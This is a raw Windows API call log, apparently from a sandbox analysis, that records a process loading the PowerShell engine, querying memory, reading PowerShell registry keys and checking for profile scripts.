	[0357.295] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0357.303] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0357.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.303] CoTaskMemFree (pv=0x1b7a8b00) 
	[0357.615] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7a8c10
	[0357.616] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7a8d20
	[0358.041] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.211] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.214] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.214] VirtualQuery (in: lpAddress=0x109fc0, lpBuffer=0x10ae80, dwLength=0x30 | out: lpBuffer=0x10ae80*(BaseAddress=0x109000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.240] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.241] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.320] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.321] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.321] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.322] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.323] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.323] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.324] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.324] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.324] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.324] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.324] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.324] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.324] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.325] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.333] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.334] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.334] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.334] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.334] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.334] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0358.341] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.342] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.351] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.351] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.463] VirtualQuery (in: lpAddress=0x10b820, lpBuffer=0x10c6e0, dwLength=0x30 | out: lpBuffer=0x10c6e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0358.469] VirtualQuery (in: lpAddress=0x10b820, lpBuffer=0x10c6e0, dwLength=0x30 | out: lpBuffer=0x10c6e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.469] VirtualQuery (in: lpAddress=0x10b070, lpBuffer=0x10bf30, dwLength=0x30 | out: lpBuffer=0x10bf30*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.469] VirtualQuery (in: lpAddress=0x10b070, lpBuffer=0x10bf30, dwLength=0x30 | out: lpBuffer=0x10bf30*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.470] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d678 | out: phkResult=0x10d678*=0x36c) returned 0x0
	[0358.470] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d5fc, lpData=0x0, lpcbData=0x10d5f8*=0x0 | out: lpType=0x10d5fc*=0x1, lpData=0x0, lpcbData=0x10d5f8*=0x56) returned 0x0
	[0358.470] CoTaskMemAlloc (cb=0x5a) returned 0x3cc8d0
	[0358.470] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d5cc, lpData=0x3cc8d0, lpcbData=0x10d5c8*=0x56 | out: lpType=0x10d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d5c8*=0x56) returned 0x0
	[0358.470] CoTaskMemFree (pv=0x3cc8d0) 
	[0358.470] RegCloseKey (hKey=0x36c) returned 0x0
	[0358.470] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d678 | out: phkResult=0x10d678*=0x36c) returned 0x0
	[0358.470] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d5fc, lpData=0x0, lpcbData=0x10d5f8*=0x0 | out: lpType=0x10d5fc*=0x1, lpData=0x0, lpcbData=0x10d5f8*=0x56) returned 0x0
	[0358.470] CoTaskMemAlloc (cb=0x5a) returned 0x3cc8d0
	[0358.470] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d5cc, lpData=0x3cc8d0, lpcbData=0x10d5c8*=0x56 | out: lpType=0x10d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d5c8*=0x56) returned 0x0
	[0358.470] CoTaskMemFree (pv=0x3cc8d0) 
	[0358.471] RegCloseKey (hKey=0x36c) returned 0x0
	[0358.471] CoTaskMemAlloc (cb=0x20c) returned 0x1b7a4970
	[0358.471] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7a4970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0358.471] CoTaskMemFree (pv=0x1b7a4970) 
	[0358.471] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0358.471] CoTaskMemAlloc (cb=0x20c) returned 0x1b7a4970
	[0358.471] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7a4970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0358.471] CoTaskMemFree (pv=0x1b7a4970) 
	[0358.471] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0358.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0358.472] SetErrorMode (uMode=0x1) returned 0x1
	[0358.472] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d5e0 | out: lpFileInformation=0x10d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0358.472] SetErrorMode (uMode=0x1) returned 0x1
	[0358.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0358.473] SetErrorMode (uMode=0x1) returned 0x1
	[0358.473] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d5e0 | out: lpFileInformation=0x10d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0358.473] SetErrorMode (uMode=0x1) returned 0x1
	[0358.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0358.473] SetErrorMode (uMode=0x1) returned 0x1
	[0358.473] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d5e0 | out: lpFileInformation=0x10d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0358.473] SetErrorMode (uMode=0x1) returned 0x1
	[0358.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0358.473] SetErrorMode (uMode=0x1) returned 0x1
	[0358.473] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d5e0 | out: lpFileInformation=0x10d5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0358.473] SetErrorMode (uMode=0x1) returned 0x1
	[0358.474] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.474] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.475] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.475] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.525] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.525] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.528] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.528] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.533] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.533] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.535] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x36c
	[0358.535] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0358.535] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0358.535] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0358.535] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0358.535] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0358.535] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0358.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0358.536] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x318
	[0358.536] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328
	[0358.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0358.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0358.538] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.538] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.541] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
